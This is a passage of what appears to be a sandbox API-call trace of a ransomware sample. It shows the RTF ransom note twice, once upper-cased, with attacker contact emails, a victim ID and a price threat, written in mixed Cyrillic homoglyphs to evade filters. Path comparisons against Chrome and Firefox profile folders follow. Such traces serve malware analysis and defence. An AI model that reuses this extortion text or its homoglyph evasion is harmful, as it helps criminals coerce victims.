fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 [RDM_STR]\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchLength=0x1c50 | out: lpsz="{\\RTF1\\ANSI\\ANSICPG1251\\DEFF0\\NOUICOMPAT\\DEFLANG1049{\\FONTTBL{\\F0\\FNIL\\FCHARSET0 CALIBRI;}{\\F1\\FNIL\\FCHARSET204 CALIBRI;}}\r\n{\\COLORTBL ;\\RED255\\GREEN0\\BLUE0;\\RED255\\GREEN255\\BLUE255;}\r\n{\\*\\GENERATOR RICHED20 10.0.15063}\\VIEWKIND4\\UC1 \r\n\\PARD\\RI-74\\SL240\\SLMULT1\\QC\\TX8378\\B\\F0\\FS24\\LANG1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\PAR\r\n\r\n\\PARD\\RI-74\\SL240\\SLMULT1\\TX8378\\PAR\r\n\\B0 ALL Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S W\\F1\\LANG1049\\'E5\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'F1\\F0\\LANG1033 R\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D WITH STR\\F1\\LANG1049\\'EE\\F0\\LANG1033 NG CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'EE\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 LG\\F1\\LANG1049\\'EE\\F0\\LANG1033 RITHM \\F1\\LANG1049\\'C0\\'C5\\F0\\LANG1033 S-256 + RS\\F1\\LANG1049\\'C0\\F0\\LANG1033 -2048.\\PAR\r\nPL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 B\\F1\\LANG1049\\'E5\\F0\\LANG1033 SUR\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E0\\F0\\LANG1033 T Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S \\F1\\LANG1049\\'E0\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T BR\\F1\\LANG1049\\'EE\\F0\\LANG1033 K\\F1\\LANG1049\\'E5\\F0\\LANG1033 N \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 U C\\F1\\LANG1049\\'E0\\F0\\LANG1033 N R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 M T\\F1\\LANG1049\\'EE\\F0\\LANG1033 D\\F1\\LANG1049\\'E0\\F0\\LANG1033 Y.\\PAR\r\n\\PAR\r\nIF Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 LL\\F1\\LANG1049\\'F3\\F0\\LANG1033 W\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT T\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST\\F1\\LANG1049\\'EE\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 WRIT\\F1\\LANG1049\\'E5\\F0\\LANG1033 US T\\F1\\LANG1049\\'EE\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E5\\F0\\LANG1033 -M\\F1\\LANG1049\\'E0\\F0\\LANG1033 ILS:\\PAR\r\n\\B\\FS28 BOBGREEN85@CRIPTEXT.COM\\PAR\r\nBOBGREEN85@AOL.COM\\PAR\r\nBOBGREEN85@TUTANOTA.COM\\PAR\r\n\\B0\\FS24 IN SUBJ\\F1\\LANG1049\\'E5\\F0\\LANG1033 CT LIN\\F1\\LANG1049\\'E5\\F0\\LANG1033 WRIT\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 UR ID: \\B\\FS28 2660EAA9CA5C3071\\FS24\\PAR\r\n\\PAR\r\n\\CF1 IMP\\F1\\LANG1049\\'EE\\F0\\LANG1033 RT\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT!\\CF0 PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR M\\F1\\LANG1049\\'E5\\F0\\LANG1033 SS\\F1\\LANG1049\\'E0\\F0\\LANG1033 G\\F1\\LANG1049\\'E5\\F0\\LANG1033 T\\F1\\LANG1049\\'EE\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 LL \\F1\\LANG1049\\'EE\\F0\\LANG1033 F \\F1\\LANG1049\\'EE\\F0\\LANG1033 UR 3 \\F1\\LANG1049\\'E5\\F0\\LANG1033 -M\\F1\\LANG1049\\'E0\\F0\\LANG1033 IL \\F1\\LANG1049\\'E0\\F0\\LANG1033 DDR\\F1\\LANG1049\\'E5\\F0\\LANG1033 SS\\F1\\LANG1049\\'E5\\F0\\LANG1033 S. THIS IS R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 LL\\F1\\LANG1049\\'F3\\F0\\LANG1033 IMP\\F1\\LANG1049\\'EE\\F0\\LANG1033 RT\\F1\\LANG1049\\'E0\\F0\\LANG1033 NT B\\F1\\LANG1049\\'E5\\F0\\LANG1033 C\\F1\\LANG1049\\'E0\\F0\\LANG1033 US\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'EE\\F0\\LANG1033 F D\\F1\\LANG1049\\'E5\\F0\\LANG1033 LIV\\F1\\LANG1049\\'E5\\F0\\LANG1033 R\\F1\\LANG1049\\'F3\\F0\\LANG1033 PR\\F1\\LANG1049\\'EE\\F0\\LANG1033 BL\\F1\\LANG1049\\'E5\\F0\\LANG1033 MS \\F1\\LANG1049\\'EE\\F0\\LANG1033 F S\\F1\\LANG1049\\'EE\\F0\\LANG1033 M\\F1\\LANG1049\\'E5\\F0\\LANG1033 M\\F1\\LANG1049\\'E0\\F0\\LANG1033 IL S\\F1\\LANG1049\\'E5\\F0\\LANG1033 RVI\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 S!\\PAR\r\n\\CF1 IMPORTANT!\\CF0 IF YOU HAVEN'T RECEIVED A RESPONSE FROM US WITHIN 24 HOURS, PLEASE TRY TO USE A DIFFERENT EMAIL SERVICE\\F1\\LANG1049 (\\F0\\LANG1033 GMAIL, YAHOO, AOL, ETC\\F1\\LANG1049 )\\F0\\LANG1033 .\\PAR\r\n\\CF1 IMPORTANT!\\CF0 PLEASE CHECK YOUR SPAM FOLDER EACH TIME YOU WAIT FOR OUR RESPONSE! IF YOU FIND OUR EMAIL IN THE SPAM FOLDER PLEASE MOVE IT TO YOUR INBOX.\\PAR\r\n\\CF1 IMPORTANT! \\CF0 WE ARE ALWAYS IN TOUCH AND READY TO HELP YOU AS SOON AS POSSIBLE!\\PAR\r\n\\PAR\r\n\\B0\\F1\\LANG1049\\'C0\\F0\\LANG1033 TT\\F1\\LANG1049\\'E0\\F0\\LANG1033 CH UP T\\F1\\LANG1049\\'EE\\F0\\LANG1033 3 SM\\F1\\LANG1049\\'E0\\F0\\LANG1033 LL \\F1\\LANG1049\\'E5\\F0\\LANG1033 NCR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R FR\\F1\\LANG1049\\'E5\\'E5\\F0\\LANG1033 T\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST D\\F1\\LANG1049\\'E5\\'F1\\F0\\LANG1033 RYPTION. PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 TE TH\\F1\\LANG1049\\'E0\\F0\\LANG1033 T TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND US SH\\F1\\LANG1049\\'EE\\F0\\LANG1033 ULD N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T C\\F1\\LANG1049\\'EE\\F0\\LANG1033 NT\\F1\\LANG1049\\'E0\\F0\\LANG1033 IN \\F1\\LANG1049\\'E0\\F0\\LANG1033 N\\F1\\LANG1049\\'F3\\F0\\LANG1033 V\\F1\\LANG1049\\'E0\\F0\\LANG1033 LU\\F1\\LANG1049\\'E0\\F0\\LANG1033 BL\\F1\\LANG1049\\'E5\\F0\\LANG1033 INF\\F1\\LANG1049\\'EE\\F0\\LANG1033 RM\\F1\\LANG1049\\'E0\\F0\\LANG1033 TI\\F1\\LANG1049\\'EE\\F0\\LANG1033 N.\\F1\\LANG1049 \\F0\\LANG1033 W\\F1\\LANG1049\\'E5\\F0\\LANG1033 WILL S\\F1\\LANG1049\\'E5\\F0\\LANG1033 ND Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 U T\\F1\\LANG1049\\'E5\\F0\\LANG1033 ST D\\F1\\LANG1049\\'E5\\F0\\LANG1033 CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT\\F1\\LANG1049\\'E5\\F0\\LANG1033 D FILES IN \\F1\\LANG1049\\'EE\\F0\\LANG1033 UR R\\F1\\LANG1049\\'E5\\F0\\LANG1033 SP\\F1\\LANG1049\\'EE\\F0\\LANG1033 NS\\F1\\LANG1049\\'E5\\F0\\LANG1033 F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR C\\F1\\LANG1049\\'EE\\F0\\LANG1033 NFID\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 .\\PAR\r\nOF COURSE YOU WILL RECEIVE ALL THE NECESSARY INSTRUCTIONS H\\F1\\LANG1049\\'EE\\F0\\LANG1033 W T\\F1\\LANG1049\\'EE\\F0\\LANG1033 D\\F1\\LANG1049\\'E5\\F0\\LANG1033 CR\\F1\\LANG1049\\'F3\\F0\\LANG1033 PT Y\\F1\\LANG1049\\'EE\\F0\\LANG1033 UR FIL\\F1\\LANG1049\\'E5\\F0\\LANG1033 S!\\PAR\r\n\\PAR\r\n\\CF1\\B IMPORTANT!\\PAR\r\n\\CF0 PL\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 TE THAT WE ARE PROFESSIONALS AND JUST DOING OUR JOB!\\PAR\r\nPLEASE D\\F1\\LANG1049\\'EE\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T W\\F1\\LANG1049\\'E0\\F0\\LANG1033 ST\\F1\\LANG1049\\'E5\\F0\\LANG1033 TH\\F1\\LANG1049\\'E5\\F0\\LANG1033 TIM\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND D\\F1\\LANG1049\\'EE\\F0\\LANG1033 N\\F1\\LANG1049\\'EE\\F0\\LANG1033 T TR\\F1\\LANG1049\\'F3\\F0\\LANG1033 TO D\\F1\\LANG1049\\'E5\\'F1\\'E5\\F0\\LANG1033 IVE US - IT WILL R\\F1\\LANG1049\\'E5\\F0\\LANG1033 SULT \\F1\\LANG1049\\'EE\\F0\\LANG1033 NLY PRI\\F1\\LANG1049\\'F1\\'E5\\F0\\LANG1033 INCR\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 S\\F1\\LANG1049\\'E5\\F0\\LANG1033 !\\PAR\r\nW\\F1\\LANG1049\\'E5\\F0\\LANG1033 \\F1\\LANG1049\\'E0\\F0\\LANG1033 R\\F1\\LANG1049\\'E5\\F0\\LANG1033 ALW\\F1\\LANG1049\\'E0\\'F3\\F0\\LANG1033 S \\F1\\LANG1049\\'EE\\F0\\LANG1033 P\\F1\\LANG1049\\'E5\\F0\\LANG1033 N\\F1\\LANG1049\\'E5\\F0\\LANG1033 D F\\F1\\LANG1049\\'EE\\F0\\LANG1033 R DI\\F1\\LANG1049\\'E0\\F0\\LANG1033 L\\F1\\LANG1049\\'EE\\F0\\LANG1033 G \\F1\\LANG1049\\'E0\\F0\\LANG1033 ND R\\F1\\LANG1049\\'E5\\'E0\\F0\\LANG1033 DY T\\F1\\LANG1049\\'EE\\F0\\LANG1033 H\\F1\\LANG1049\\'E5\\F0\\LANG1033 LP \\F1\\LANG1049\\'F3\\'EE\\F0\\LANG1033 U.\\PAR\r\n\\CF2\\FS28 [RDM_STR]\\CF0\\F1\\FS32\\LANG1049\\PAR\r\n}\r\n") returned 0x1c50 [0064.345] CharUpperBuffW (in: lpsz="[RDM_STR]", cchLength=0x9 | out: lpsz="[RDM_STR]") returned 0x9 [0064.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 1 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 1 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 2 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 1 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 2 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 1 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 2 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount2=44) returned 3 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount2=44) returned 3 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 2 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 2 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files 